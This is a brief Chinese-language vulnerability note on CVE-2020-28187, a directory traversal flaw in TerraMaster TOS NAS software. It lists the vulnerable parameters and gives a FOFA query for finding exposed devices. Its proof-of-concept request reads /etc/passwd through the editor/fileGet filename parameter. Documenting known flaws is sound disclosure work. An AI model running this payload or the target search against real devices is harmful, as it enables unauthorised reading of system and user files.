# TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187
## 漏洞描述
TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数,读取文件系统中的任何文件。 ## 漏洞影响 > TerraMaster TOS < 4.2.06 ## FOFA > “TerraMaster” && header=”TOS”
## 漏洞复现
登陆后访问,验证漏洞的POC为
“`
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
“`
![](/static/qingy/TerraMaster_TOS_后台任意文件读取漏洞_CVE-2020-28187/img/tm-8.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容